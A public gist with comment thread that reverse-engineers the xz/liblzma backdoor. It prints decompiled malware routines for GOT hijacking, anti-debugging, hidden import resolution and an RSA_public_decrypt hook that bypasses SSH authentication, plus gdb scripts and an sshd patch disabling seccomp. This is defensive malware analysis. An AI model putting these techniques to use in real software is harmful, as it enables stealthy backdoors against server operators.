@smx-smx
Last active October 12, 2024 07:23
[WIP] XZ Backdoor Analysis and symbol mapping

Discord Room for discussion

https://discord.com/invite/maFYmgQkYH

Github repository:

https://github.com/smx-smx/xzre

Init routines
  • Llzma_delta_props_decoder -> backdoor_ctx_save
  • Llzma_block_param_encoder_0 -> backdoor_init
  • Llzma_delta_props_encoder -> backdoor_init_stage2

  • Llzip_decode_1 -> table1

  • Lcrc64_clmul_1 -> table2

  • Llz_stream_decode -> count_1_bits

  • Lsimple_coder_update_0 -> table_get

    • Retrieves the index of the encoded string given the plaintext string in memory
  • Lcrc_init_0 -> import_lookup

  • .Lcrc64_generic.0 -> import_lookup_ex


Anti RE and x64 code Dasm
  • Llzma_block_buffer_encode_0 -> check_software_breakpoint

  • Lx86_code_part_0 -> code_dasm

  • Llzma_index_iter_rewind_cold -> check_return_address

    • Checks if the return address has been tampered with. This function is called at the beginning of a "protected" function. If the check fails, the function returns early without doing anything

  • Llzma_delta_decoder_init_part_0 -> backdoor_vtbl_init

    • It sets up a vtable with core functions used by the backdoor
  • Lstream_decoder_memconfig_part_1 -> get_lzma_allocator

  • Llzma_simple_props_encode_1 -> j_tls_get_addr

  • Llzma_block_uncomp_encode_0 -> rodata_ptr_offset

  • Llzma12_coder_1 -> global_ctx


ELF parsing
  • Llzma_filter_decoder_is_supported.part.0 -> parse_elf_invoke

  • Lmicrolzma_encoder_init_1 -> parse_elf_init

  • Lget_literal_price_part_0 -> parse_elf

  • Llzma_stream_header_encode_part_0 -> get_ehdr_address

  • Lparse_bcj_0 -> process_elf_seg

  • Llzma_simple_props_size_part_0 -> is_gnu_relro

Stealthy ELF magic verification
  // locate elf header
  while ( 1 )
  {
    if ( (unsigned int)table_get(ehdr, 0LL) == STR__ELF ) // 0x300
      break; // found
    ehdr -= 64; // backtrack and try again
    if ( ehdr == start_pointer )
      goto not_found;
  }

  • Llzma_stream_flags_compare_1 -> get_rodata_ptr
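The backward scan from the "Stealthy ELF magic verification" snippet can be modelled in a few lines of Python. This is a minimal sketch, not the malware's code: it compares against the literal magic bytes, whereas the backdoor avoids embedding that string and asks table_get for its encoded ID instead (STR__ELF, 0x300). The name find_elf_header and the 4096-byte stride are assumptions; the stride assumes ehdr is typed as Elf64_Ehdr * (64 bytes per element), so that ehdr -= 64 moves back by one page.

```python
ELF_MAGIC = b"\x7fELF"
PAGE_SIZE = 64 * 64  # assumption: 64 elements of a 64-byte Elf64_Ehdr, i.e. one 4096-byte page


def find_elf_header(memory: bytes, start: int, stop: int, step: int = PAGE_SIZE):
    """Walk backwards from `start` in `step`-sized strides looking for the ELF magic.

    Mirrors the decompiled loop: check, step back, and give up once `stop`
    is reached (the `stop` offset itself is never checked).
    """
    offset = start
    while True:
        if memory[offset:offset + 4] == ELF_MAGIC:
            return offset  # found
        offset -= step  # backtrack and try again
        if offset <= stop:
            return None  # not found


# Hypothetical 3-page image with the ELF header on the second page.
image = bytearray(3 * PAGE_SIZE)
image[PAGE_SIZE:PAGE_SIZE + 4] = ELF_MAGIC
header_offset = find_elf_header(bytes(image), start=2 * PAGE_SIZE, stop=0)
```

Stepping a whole page at a time works because a loaded ELF image starts on a page boundary, so the header can only sit at page-aligned addresses.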

Verified or Suspected function hooking
  • Llzma_index_memusage_0 -> apply_entries

  • Llzma_check_init_part_0 -> apply_one_entry

  • Lrc_read_init_part_0 -> apply_one_entry_internal

  • Llzma_lzma_optimum_fast_0 -> install_entries

  • Llzip_decoder_memconfig_part_0 -> installed_func_0

  • Llzma_index_prealloc_0 -> RSA_public_decrypt GOT hook/detour

  • Llzma_index_stream_size_1 -> check_special_rsa_key (thanks q3k)

    • Called from Llzma_index_prealloc_0, it checks if the supplied RSA key is the special key to bypass the normal authentication flow
  • Lindex_decode_1 -> installed_func_2

  • Lindex_encode_1 -> installed_func_3

  • Llzma2_decoder_end_1 -> apply_one_entry_ex

  • Llzma2_encoder_init.1 -> apply_method_1

  • Llzma_memlimit_get_1 -> apply_method_2


lzma allocator / call hiding

  • Lstream_decoder_mt_end_0 -> get_lzma_allocator_addr
  • Linit_pric_table_part_1 -> fake_lzma_allocator
  • Lstream_decode_1 -> fake_lzma_free

core functionality
  • Llzma_delta_props_encode_part_0 -> resolve_imports (including system())

  • Llzma_index_stream_flags_0 -> process_shared_libraries

    • Reads the list of loaded libraries through _r_debug->r_map, and calls process_shared_libraries_map to traverse it
  • Llzma_index_encoder_init_1 -> process_shared_libraries_map

    • Traverses the list of loaded libraries, looking for specific libraries
  • func @0x7620: makes indirect calls through the vtable configured by backdoor_vtbl_init, and is called by the RSA_public_decrypt hook (func#1) when certain conditions are met

Software Breakpoint check, method 1

This method checks whether the endbr64 instruction, which is always present at the beginning of every function in the malware, has been overwritten. GDB would typically overwrite it when inserting a software breakpoint at the function entry.

/*** address: 0xAB0 ***/
__int64 check_software_breakpoint(_DWORD *code_addr, __int64 a2, int a3)
{
  unsigned int v4;

  v4 = 0;
  // [for a3=0xe230] true when *code_addr == 0xfa1e0ff3 (aka endbr64)
  if ( a2 - code_addr > 3 )
    return *code_addr + (a3 | 0x5E20000) == 0xF223;// a3 | 0x5E20000 == 0x5E2E230; the 32-bit sum wraps around to 0xF223
  return v4;
}
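The arithmetic in check_software_breakpoint can be verified by hand. The sketch below redoes it in Python under two assumptions: the addition wraps at 32 bits (code_addr points to a _DWORD), and a software breakpoint is an int3 (0xCC) written over the first byte. The helper name looks_like_endbr64 is mine.

```python
import struct

# endbr64 is encoded as F3 0F 1E FA; read as a little-endian 32-bit word.
ENDBR64_WORD = struct.unpack("<I", bytes.fromhex("f30f1efa"))[0]  # 0xFA1E0FF3


def looks_like_endbr64(first_dword: int, a3: int = 0xE230) -> bool:
    """Model of the obfuscated comparison, with 32-bit wrap-around."""
    return ((first_dword + (a3 | 0x5E20000)) & 0xFFFFFFFF) == 0xF223


# int3 (0xCC) replaces the lowest-addressed byte, i.e. the low byte of the word.
BREAKPOINTED_WORD = (ENDBR64_WORD & 0xFFFFFF00) | 0xCC

intact = looks_like_endbr64(ENDBR64_WORD)            # True
tampered = looks_like_endbr64(BREAKPOINTED_WORD)     # False
```

Splitting the constant into a3 and 0x5E20000 means the value 0xFA1E0FF3 never appears literally in the binary, which is presumably the point of writing the check this way.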

Function backdoor_init (0xA784)

__int64 backdoor_init(rootkit_ctx *ctx, DWORD *prev_got_ptr)
{
  _DWORD *v2;
  __int64 runtime_offset;
  bool is_cpuid_got_zero;
  void *cpuid_got_ptr;
  __int64 got_value;
  _QWORD *cpuid_got_ptr_1;

  ctx->self = ctx;
  // store data before overwrite
  backdoor_ctx_save(ctx);
  ctx->prev_got_ptr = ctx->got_ptr;
  runtime_offset = ctx->head - ctx->self;
  ctx->runtime_offset = runtime_offset;
  is_cpuid_got_zero = (char *)*(&Llzma_block_buffer_decode_0 + 1) + runtime_offset == 0LL;
  cpuid_got_ptr = (char *)*(&Llzma_block_buffer_decode_0 + 1) + runtime_offset;
  ctx->got_ptr = cpuid_got_ptr;
  if ( !is_cpuid_got_zero )
  {
    cpuid_got_ptr_1 = cpuid_got_ptr;
    got_value = *(QWORD *)cpuid_got_ptr;
    // replace with Llzma_delta_props_encoder (backdoor_init_stage2)
    *(QWORD *)cpuid_got_ptr = (char *)*(&Llzma_block_buffer_decode_0 + 2) + runtime_offset;
    // this calls Llzma_delta_props_encoder due to the GOT overwrite
    runtime_offset = cpuid((unsigned int)ctx, prev_got_ptr, cpuid_got_ptr, &Llzma_block_buffer_decode_0, v2);
    // restore original
    *cpuid_got_ptr_1 = got_value;
  }
  return runtime_offset;
}

Function Name matching (function 0x28C0)
str_id = table_get(a6, 0LL);
...
if ( str_id == STR_RSA_public_decrypt_ && v11 )
...
else if ( v13 && str_id == STR_EVP_PKEY_set__RSA_ )
...
else if (str_id != STR_RSA_get__key_ || !v17 )
Hidden calls (via lzma_alloc)

lzma_alloc has the following prototype:

extern void * lzma_alloc (size_t size , const lzma_allocator * allocator )

The malware implements a custom allocator, which is obtained from get_lzma_allocator @ 0x4050

void *get_lzma_allocator()
{
  return get_lzma_allocator_addr() + 8;
}

char *get_lzma_allocator_addr()
{
  unsigned int i;
  char *mem;

  // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930).
  // Adding 0x180 gets to 0xCAB0 (Lx86_coder_destroy). Since the caller adds +8, we get to 0xCAB8, which is the lzma_allocator itself
  mem = (char *)Llookup_filter_part_0;
  for ( i = 0; i <= 0xB; ++i )
    mem += 32;
  return mem;
}

The interface for lzma_allocator can be viewed for example here: https://github.com/frida/xz/blob/e70f5800ab5001c9509d374dbf3e7e6b866c43fe/src/liblzma/api/lzma/base.h#L378-L440

Therefore, the allocator is Linit_pric_table_part_1 and free is Lstream_decode_1
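The address computation is easy to get wrong by one iteration, so here is a small Python model of the two functions. It only reproduces the loop arithmetic; the base value 0xC930 is the one quoted in the code comment above, and nothing here reads the real binary.

```python
def get_lzma_allocator_addr(base: int) -> int:
    """Model of the loop: i runs from 0 to 0xB inclusive, adding 32 each time."""
    mem = base
    for _ in range(0xB + 1):  # 12 iterations
        mem += 32
    return mem


def get_lzma_allocator(base: int) -> int:
    """The allocator struct starts 8 bytes after the computed address."""
    return get_lzma_allocator_addr(base) + 8


BASE = 0xC930  # value taken from the comment in get_lzma_allocator_addr
total_offset = get_lzma_allocator_addr(0)       # 12 * 32 = 0x180
allocator_addr = get_lzma_allocator(BASE)       # 0xC930 + 0x180 + 8
```

Building the offset in a loop instead of using a single constant looks like another way to keep a recognizable displacement out of the disassembly, although that is a guess.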

  • NOTE: the function used for alloc is very likely import_lookup_ex, which turns lzma_alloc into an import resolution function. This is used a lot in resolve_imports, e.g.:
                system_func = lzma_alloc(STR_system_, lzma_allocator);
                ctx->system = system_func;
                if ( system_func )
                  ++ctx->num_imports;
                shutdown_func = lzma_alloc(STR_shutdown_, lzma_allocator);
                ctx->shutdown = shutdown_func;
                if ( shutdown_func )
                  ++ctx->num_imports;

The third lzma_allocator field, opaque, is abused to pass information about the loaded ELF file to the "fake allocator" function. This is highlighted quite well by function Llzma_index_buffer_encode_0:

__int64 Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, struct_elf_info *elf_info, struct_ctx *ctx)
{
  _QWORD *lzma_allocator;
  __int64 result;
  __int64 fn_read;
  __int64 fn_errno_location;

  lzma_allocator = get_lzma_allocator();
  result = parse_elf(*p_elf, elf_info);         // reads elf into elf_info
  if ( (_DWORD)result )
  {
    lzma_allocator[2] = elf_info;               // set opaque field to the parsed elf info
    fn_read = lzma_alloc(STR_read_, lzma_allocator);
    ctx->fn_read = fn_read;
    if ( fn_read )
      ++ctx->num_imports;
    fn_errno_location = lzma_alloc(STR___errno_location_, lzma_allocator);
    ctx->fn_errno_location = fn_errno_location;
    if ( fn_errno_location )
      ++ctx->num_imports;
    return ctx->num_imports == 2; // true if we found both imports
  }
  return result;
}

Note how the malware passes an EncodedStringID in place of size
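To make the trick concrete, here is a rough Python model of the call path. It relies on one fact about liblzma: when a custom allocator is supplied, lzma_alloc forwards to allocator->alloc(allocator->opaque, 1, size). Everything else is hypothetical and only for illustration: the string ID values, the symbol addresses, and the use of a dict in place of the parsed ELF info.

```python
from dataclasses import dataclass
from typing import Any, Callable, Optional


@dataclass
class LzmaAllocator:
    """Same three fields, in the same order, as liblzma's lzma_allocator."""
    alloc: Optional[Callable[[Any, int, int], Any]]
    free: Optional[Callable[[Any, Any], None]]
    opaque: Any = None


def lzma_alloc(size: int, allocator: LzmaAllocator) -> Any:
    """Simplified lzma_alloc: with a custom allocator it just forwards the call."""
    return allocator.alloc(allocator.opaque, 1, size)


# Hypothetical encoded string IDs (the real values are not reproduced here).
STRING_IDS = {0x10: "read", 0x20: "__errno_location"}


def fake_lzma_alloc(opaque: Any, nmemb: int, size: int) -> Any:
    """Stand-in for the fake allocator: `size` is really a string ID, and
    `opaque` carries the symbol information of the ELF being searched."""
    symbol = STRING_IDS.get(size)
    return opaque.get(symbol)


# Hypothetical symbol table playing the role of elf_info.
elf_info = {"read": 0x7F0000001000}
allocator = LzmaAllocator(alloc=fake_lzma_alloc, free=None, opaque=elf_info)

fn_read = lzma_alloc(0x10, allocator)             # resolved "address"
fn_errno_location = lzma_alloc(0x20, allocator)   # None: symbol not found
num_imports = sum(fn is not None for fn in (fn_read, fn_errno_location))
```

To anyone skimming the disassembly, each import lookup therefore looks like an ordinary memory allocation through the library's own API.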

Dynamic analysis

Analyzing the initialization routine

  1. Replace the endbr64 in get_cpuid with a jmp . ("\xeb\xfe")
root@debian:~# cat /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 > liblzma.so.5.6.1
root@debian:~# perl -pe 's/\xF3\x0F\x1E\xFA\x55\x48\x89\xF5\x4C\x89\xCE/\xEB\xFE\x90\x90\x55\x48\x89\xF5\x4C\x89\xCE/g' -i liblzma.so.5.6.1
  2. Force sshd to use the modified library with LD_PRELOAD
# env -i LC_LANG=C LD_PRELOAD=$PWD/liblzma.so.5.6.1 /usr/sbin/sshd -h

NOTE: anarazel recommends using LD_LIBRARY_PATH with a symlink instead, since LD_PRELOAD changes the initialization order and could interfere with the normal flow of the malware

2b. or use this gdbinit file to do it all at once

# cat gdbinit
set confirm off
unset env

## comment this out if you don't want to debug the initialization code
## (or use LD_LIBRARY_PATH instead)
set env LD_PRELOAD=/root/sshd/liblzma.so.5.6.1
set env LANG=C
file /usr/sbin/sshd
## start sshd on port 2022
set args -p 2022
set disassembly-flavor intel
set confirm on
set startup-with-shell off

show env
show args

# gdb -x gdbinit
(gdb) r
Starting program: /usr/sbin/sshd -p 222
^C <-- send CTRL-C
Program received signal SIGINT, Interrupt.
0x00007ffff7f8a7f0 in ?? ()
  3. Attach to the frozen process with your favourite debugger (gdb attach pid)
(gdb) bt
#0  0x00007f8cb3b067f0 in ?? () from /root/sshd/liblzma.so.5.6.1
#1  0x00007f8cb3b08c29 in lzma_crc32 () from /root/sshd/liblzma.so.5.6.1
#2  0x00007f8cb3b4ffab in elf_machine_rela (skip_ifunc=<optimized out>,
    reloc_addr_arg=0x7f8cb3b3dda0 <lzma_crc32@got[plt]>,
    version=<optimized out>, sym=0x7f8cb3b03018, reloc=0x7f8cb3b04fc8,
    scope=0x7f8cb3b3f4f8, map=0x7f8cb3b3f170)
    at ../sysdeps/x86_64/dl-machine.h:300
#3  elf_dynamic_do_Rela (skip_ifunc=<optimized out>, lazy=<optimized out>,
    nrelative=<optimized out>, relsize=<optimized out>,
    reladdr=<optimized out>, scope=<optimized out>, map=0x7f8cb3b3f170)
    at ./elf/do-rel.h:147
#4  _dl_relocate_object (l=l@entry=0x7f8cb3b3f170, scope=<optimized out>,
    reloc_mode=<optimized out>, consider_profiling=<optimized out>,
    consider_profiling@entry=0) at ./elf/dl-reloc.c:301
#5  0x00007f8cb3b5e6e9 in dl_main (phdr=<optimized out>, phnum=<optimized out>,
    user_entry=<optimized out>, auxv=<optimized out>) at ./elf/rtld.c:2318
#6  0x00007f8cb3b5af0f in _dl_sysdep_start (
    start_argptr=start_argptr@entry=0x7ffe17e402e0,
    dl_main=dl_main@entry=0x7f8cb3b5c900 <dl_main>)
    at ../sysdeps/unix/sysv/linux/dl-sysdep.c:140
#7  0x00007f8cb3b5c60c in _dl_start_final (arg=0x7ffe17e402e0)
    at ./elf/rtld.c:498
#8  _dl_start (arg=0x7ffe17e402e0) at ./elf/rtld.c:585
#9  0x00007f8cb3b5b4d8 in _start () from /lib64/ld-linux-x86-64.so.2
#10 0x0000000000000002 in ?? ()
#11 0x00007ffe17e40fa1 in ?? ()
#12 0x00007ffe17e40fb0 in ?? ()
#13 0x0000000000000000 in ?? ()

NOTE: _get_cpuid calls function 0xA710, whose purpose is to detect whether we're at the right point to initialize the backdoor. Why? Because elf_machine_rela calls _get_cpuid for both lzma_crc32 and lzma_crc64. Since the modified code is part of lzma_crc64, 0xA710 keeps a simple call counter to track how many times it has been called, which makes sure the modification doesn't trigger for lzma_crc32.

  • first call (0): -> lzma_crc32
  • second call (1): -> lzma_crc64
  if ( call_counter == 1 )
  {
    /** NOTE: some of these fields are unverified and guessed **/
    rootkit_ctx.head = 1LL;
    memset(&rootkit_ctx.runtime_offset, 0, 32);
    rootkit_ctx.prev_got_ptr = prev_got_ptr;
    backdoor_init(&rootkit_ctx, prev_got_ptr);  // replace cpuid got entry
  }
  ++call_counter;
  cpuid(a1, &v5, &v6, &v7, &rootkit_ctx);
  return v5;
}
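The effect of the counter can be illustrated with a toy model. This is only a sketch of the control flow described above; the class name and the recorded labels are made up, and the real function also performs the cpuid query itself.

```python
class GetCpuidModel:
    """Toy model of function 0xA710: initialize only on the second call."""

    def __init__(self) -> None:
        self.call_counter = 0
        self.initialized_for = []  # which resolver call triggered backdoor_init

    def __call__(self, resolver_name: str) -> None:
        if self.call_counter == 1:
            # stands in for backdoor_init(&rootkit_ctx, prev_got_ptr)
            self.initialized_for.append(resolver_name)
        self.call_counter += 1


get_cpuid = GetCpuidModel()
get_cpuid("lzma_crc32")  # first call (0): nothing happens
get_cpuid("lzma_crc64")  # second call (1): initialization runs
```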

At this point, you can issue detach and attach with other debuggers if needed.

Once attached, set relevant breakpoints and restore the original bytes ("\xF3\x0F\x1E\xFA")
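For reference, the byte replacement from step 1 and its inverse can also be sketched in Python. The patterns are the ones from the perl one-liner; the function name swap_bytes is an assumption, and the sketch works on an in-memory copy of the file rather than on a live process.

```python
# Pattern from the perl one-liner: endbr64 followed by the next instructions.
ORIGINAL = bytes.fromhex("f30f1efa" "554889f54c89ce")
# Same context, with endbr64 replaced by `jmp .` (EB FE) and two NOPs.
PATCHED = bytes.fromhex("ebfe9090" "554889f54c89ce")


def swap_bytes(image: bytes, old: bytes, new: bytes):
    """Replace every occurrence of `old` with `new`; return (image, count)."""
    return image.replace(old, new), image.count(old)


# Hypothetical stand-in for the library contents.
library = b"\x00" * 16 + ORIGINAL + b"\xc3"
frozen, hits = swap_bytes(library, ORIGINAL, PATCHED)    # step 1
restored, _ = swap_bytes(frozen, PATCHED, ORIGINAL)      # undo
```

Checking that the match count is exactly 1 before writing the file back is a cheap way to make sure the pattern did not hit an unrelated function.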

breakpoint on RSA_public_decrypt hook

Run this gdb script on the sshd listener process. This new gdbinit script should account for possible differences in the library load address (this didn't happen for me in the first tests, but it did later on).

set pagination off
set follow-fork-mode child
catch load
# now we forked, wait for lzma
catch load liblzma
c
# now we have lzma
# 0x12750: offset from base
hbreak *(lzma_crc32 - 0x2640 + 0x12750)
set disassembly-flavor intel
set pagination on
c
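The hbreak expression derives the hook address from a symbol that gdb can still resolve. My reading, which is an assumption, is that 0x2640 is the offset of lzma_crc32 inside the library and 0x12750 is the offset of the hook. The runtime address in the example below is made up.

```python
LZMA_CRC32_OFFSET = 0x2640   # assumed offset of lzma_crc32 from the load base
HOOK_OFFSET = 0x12750        # "offset from base" in the gdb script


def hook_breakpoint_address(lzma_crc32_addr: int) -> int:
    """Recover the load base from lzma_crc32, then add the hook offset."""
    load_base = lzma_crc32_addr - LZMA_CRC32_OFFSET
    return load_base + HOOK_OFFSET


# Hypothetical runtime address of lzma_crc32.
breakpoint_addr = hook_breakpoint_address(0x7FFFF73C2640)
```

Anchoring on an exported symbol keeps the breakpoint valid even when ASLR moves the library between runs.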

Now connect via https://gist.github.com/keeganryan/a6c22e1045e67c17e88a606dfdf95ae4

...
Thread 3.1 "sshd" hit Breakpoint 1, 0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5
(gdb) bt
#0  0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5
#1  0x00007ffff73d1ae7 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5 <-- Llzma_index_prealloc_0 (offset 0x48 in vtable)
#2  0x00005555556bdd00 in ?? ()
#3  0x0000000100000004 in ?? ()
#4  0x00007fffffffdeb0 in ?? ()
#5  0x00000001f74b5d7a in ?? ()
#6  0x0000000000000000 in ?? ()
RSA_public_decrypt GOT hook (Llzma_index_prealloc_0)
  /** the following happens during pubkey login **/
  
  params[0] = 1;                                // should we call original?
  // this call checks if the supplied RSA key is special
  result = installed_func_1(rsa_key, global_ctx, params); 
  // if still 1, the payload didn't trigger, call the original function
  // if 0, bypass validation
  if ( params[0] ) 
    return real_RSA_public_decrypt(flen, from, to, rsa_key);
  return result;
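The decision logic of the hook is small enough to model directly. In this sketch the two callables stand in for installed_func_1 and the real RSA_public_decrypt; their Python signatures and the sample return values are assumptions made for illustration.

```python
def rsa_public_decrypt_hook(flen, data, rsa_key, check_key, real_decrypt):
    """Model of the hook: fall through to the real function unless the
    key check clears the "call original" flag."""
    params = [1]                          # should we call the original?
    result = check_key(rsa_key, params)   # may set params[0] = 0
    if params[0]:
        return real_decrypt(flen, data, rsa_key)
    return result


def ordinary_key_check(rsa_key, params):
    return 0  # leaves params[0] == 1, so the original is called


def special_key_check(rsa_key, params):
    params[0] = 0  # payload triggered: skip the original
    return 1


def real_decrypt(flen, data, rsa_key):
    return "real"


normal_path = rsa_public_decrypt_hook(0, b"", "key", ordinary_key_check, real_decrypt)
bypass_path = rsa_public_decrypt_hook(0, b"", "key", special_key_check, real_decrypt)
```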

Binary patch for sshd to disable seccomp and chroot (allows Frida tracing of [net] processes)

> fc /b sshd sshd_patched
Comparing files sshd sshd_patched
0001332A: 75 90 
0001332B: 6D 90
----
0004FC24: 41 C3
0004FC25: 54 90
----
00109010: 01 00
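The fc /b output lists each differing offset with the original byte followed by the patched byte, so the patch can be applied with a short script. This is a sketch: apply_patches is a name I made up, and the expected-byte check only protects against patching a different sshd build, it does not prove the binary is the same one.

```python
# (offset, original byte, patched byte), copied from the fc /b output.
PATCHES = [
    (0x1332A, 0x75, 0x90),   # jnz rel8 opcode -> nop
    (0x1332B, 0x6D, 0x90),   # jnz displacement -> nop
    (0x4FC24, 0x41, 0xC3),   # first byte of push r12 -> ret
    (0x4FC25, 0x54, 0x90),   # second byte of push r12 -> nop
    (0x109010, 0x01, 0x00),  # data byte cleared
]


def apply_patches(image: bytearray, patches=PATCHES) -> bytearray:
    """Patch `image` in place after checking every original byte matches."""
    for offset, old, _ in patches:
        if image[offset] != old:
            raise ValueError(f"unexpected byte at {offset:#x}: {image[offset]:#04x}")
    for offset, _, new in patches:
        image[offset] = new
    return image


# Usage on a real file (paths are up to you):
#   data = bytearray(open("sshd", "rb").read())
#   open("sshd_patched", "wb").write(apply_patches(data))
```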
XZ Backdoor symbol deobfuscation. Updated as I make progress
@q3k

q3k commented Mar 30, 2024

Llzma_index_stream_size_1 / installed_func_1 is the RSA_public_decrypt hook/detour.

@lockness-Ko

Currently working on making a honeypot to detect who is poking this backdoor! Your analysis has been amazingly helpful! If you haven't already, take a look at bpftrace's uprobes and uretprobes for hooking functions. https://github.com/bpftrace/bpftrace/blob/master/man/adoc/bpftrace.adoc#probes

https://github.com/lockness-Ko/xz-vulnerable-honeypot

@Klotzi111

I have not looked in the binary myself yet.
I am wondering: are the symbol names actually backdoor_ctx_save and backdoor_init? Or are these names from you?
Because if those are the original names: why would he call them backdoor? That's not very clever. They could have been easily found by dumping all symbols.

@Trimester6

Trimester6 commented Mar 31, 2024

Currently working on making a honeypot to detect who is poking this backdoor!

It's easy, CN and SG, simple as, they will route to SG if CN is geofenced

@smx-smx
Author

smx-smx commented Mar 31, 2024

I have not looked in the binary myself yet. I am wondering: are the symbol names actually backdoor_ctx_save and backdoor_init? Or are these names from you? Because if those are the original names: why would he call them backdoor? That's not very clever. They could have been easily found by dumping all symbols.

Nobody has the original names (if they do, they are in Jia Tan's crew).
I am reconstructing/guessing them by looking at the disassembled code (statically/dynamically).

@NuLL3rr0r

NuLL3rr0r commented Mar 31, 2024

No doubt the malicious actor is smart enough to steal someone else's identity.

@ItzSwirlz

ItzSwirlz commented Mar 31, 2024

Taking a look now, thanks for documenting this so I can find a place to start.

.Llzma_index_init.0 seems to be the thing seeing if installed function 1 is not there yet. - proposed name: apply_rsa_decrypt?

void .Llzma_index_init.0(long param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4)

{
  code *UNRECOVERED_JUMPTABLE;
  undefined4 local_1c;
  
  if (((global_ctx != (rootkit_ctx *)0x0) && (global_ctx->runtime_offset != 0)) &&
     (UNRECOVERED_JUMPTABLE = *(code **)(global_ctx->runtime_offset + 0x10),
     UNRECOVERED_JUMPTABLE != (code *)0x0)) {
    if (param_1 != 0) {
      RSA_public_decrypt(param_1,(long)global_ctx,&local_1c);
    }
                    /* WARNING: Could not recover jumptable at 0x0010a3b4. Too many branches */
                    /* WARNING: Treating indirect jump as call */
    (*UNRECOVERED_JUMPTABLE)(param_1,param_2,param_3,param_4);
    return;
  }
  return;
}

@ItzSwirlz

ItzSwirlz commented Mar 31, 2024

.text.parse_optiona, at 00107050, and in fake function .Llzma12_mode_map.part1, before calling table_get in a while loop, it calls what I've named table_get_first_empty_index:

long table_get_first_empty_index(char *key)

{
  long index;
  
  if (*key != '\0') {
    index = 0;
    do {
      index = index + 1;
    } while (key[index] != '\0');
    return index;
  }
  return 0;
}

.Llzma_index_iter_rewind.cold just applies an entry ("internal")

uint .Llzma_index_iter_rewind.cold(uint param_1,uint param_2,uint param_3,uint param_4)

{
  undefined8 uVar1;
  int *unaff_retaddr;
  
  uVar1 = apply_one_entry_internal(0,unaff_retaddr,param_1,param_2,param_3);
  return (uint)uVar1 | param_4;
}

@oogali

oogali commented Mar 31, 2024

_get_cpuid is designed to look similar to __get_cpuid.

The latter takes 5 arguments, as seen at https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/cpuid.h#L67.

The former, which comes from the injected object file, takes 6 arguments, with the last one being the address of a function frame offset.

static inline bool _is_arch_extension_supported(void) {
    int success = 1;
    uint32_t r[4];

    success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16);
    const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);

    return success && (r[2] & ecx_mask) == ecx_mask;
}
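For readers wondering what ecx_mask selects: in CPUID leaf 1, ECX bit 1 is PCLMULQDQ, bit 9 is SSSE3 and bit 19 is SSE4.1. The short Python sketch below decodes the mask; the helper names and the sample ECX value are made up for the example.

```python
# CPUID leaf 1, ECX feature bits used by the mask above.
ECX_FEATURE_BITS = {1: "PCLMULQDQ", 9: "SSSE3", 19: "SSE4.1"}

ECX_MASK = (1 << 1) | (1 << 9) | (1 << 19)


def required_features(mask: int = ECX_MASK):
    """Names of the feature bits set in `mask`, lowest bit first."""
    return [name for bit, name in sorted(ECX_FEATURE_BITS.items()) if mask & (1 << bit)]


def is_arch_extension_supported(ecx: int) -> bool:
    """True only if every bit of the mask is present in the reported ECX."""
    return (ecx & ECX_MASK) == ECX_MASK


features = required_features()
missing_pclmul = is_arch_extension_supported(ECX_MASK & ~(1 << 1))  # hypothetical CPU without PCLMULQDQ
```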

@luvletter2333

@smx-smx Hi, I am also working on this and maybe there is an error in your report.

void *get_lzma_allocator()
{
  return get_lzma_allocator_addr() + 8;
}

char *get_lzma_allocator_addr()
{
  unsigned int i; // [rsp+1Ch] [rbp-Ch]
  __int64 v2; // [rsp+20h] [rbp-8h]

  // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930)
  // by adding 0x160, it gets to 0xCA90 (Lx86_coder_destroy), which is subsequently used as scratch space
  // for creating the `lzma_allocator` struct (data starts after 8 bytes, at 0xCA98, which is the beginning of a .data segment)
  v2 = (__int64)Llookup_filter_part_0;
  for ( i = 0; i <= 11; ++i )
    v2 += 32LL;
  return (char *)v2;
}

Actually the loop runs 12 times, so the offset is 12*32 = 0x180.
So this function simply returns the address of _Ldecoder_1 (0xCAF0)

a.rel.ro.decoders0:000000000000CAF0 _Ldecoder_1

The lzma_allocator is at 0xCAF8, so:

alloc is Linit_pric_table_part_1
free is _Lstream_decode_1

@oogali

oogali commented Mar 31, 2024

The symbol names extracted from the object file that are not present in the actual project:

  • _get_cpuid
  • crc_init
  • init_pric_table
  • lzma_block_encoder_update

That comes from me manually walking through the symbol reference output of bingrep.

for sym in $(bingrep trojan.o | grep SHT | grep '\.text\.' | grep -v rela | awk '{ print $2 }' | sed 's/\.text\.//; s/.$//' | sort | uniq) ; do
  echo "==> ${sym}"
  grep -r "${sym}" .
  echo 
done | less

@sivizius

Did you mean 0xA794 (5.6.1, not sure where it is located in 5.6.0) instead of 0xA7849?

@smx-smx
Author

smx-smx commented Mar 31, 2024

@luvletter2333

@smx-smx Hi, I am also working on this and maybe there is an error in your report.

void *get_lzma_allocator()
{
  return get_lzma_allocator_addr() + 8;
}

char *get_lzma_allocator_addr()
{
  unsigned int i; // [rsp+1Ch] [rbp-Ch]
  __int64 v2; // [rsp+20h] [rbp-8h]

  // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930)
  // by adding 0x160, it gets to 0xCA90 (Lx86_coder_destroy), which is subsequently used as scratch space
  // for creating the `lzma_allocator` struct (data starts after 8 bytes, at 0xCA98, which is the beginning of a .data segment)
  v2 = (__int64)Llookup_filter_part_0;
  for ( i = 0; i <= 11; ++i )
    v2 += 32LL;
  return (char *)v2;
}

Actually the loop runs 12 times, so the offset is 12*32 = 0x180. So this function simply returns the address of _Ldecoder_1 (0xCAF0)

a.rel.ro.decoders0:000000000000CAF0 _Ldecoder_1

The lzma_allocator is at 0xCAF8, so:

alloc is Linit_pric_table_part_1 free is _Lstream_decode_1

Oops, you're right, I was off by one.
That's what happens when you've been staring at the thing for too long 🙂 .
Thanks for the correction

@smx-smx
Author

smx-smx commented Mar 31, 2024

Did you mean 0xA794 (5.6.1, not sure where it is located in 5.6.0) instead of 0xA7849?

0xA784, the '9' was spurious.
Fixed

@anarazel

anarazel commented Mar 31, 2024

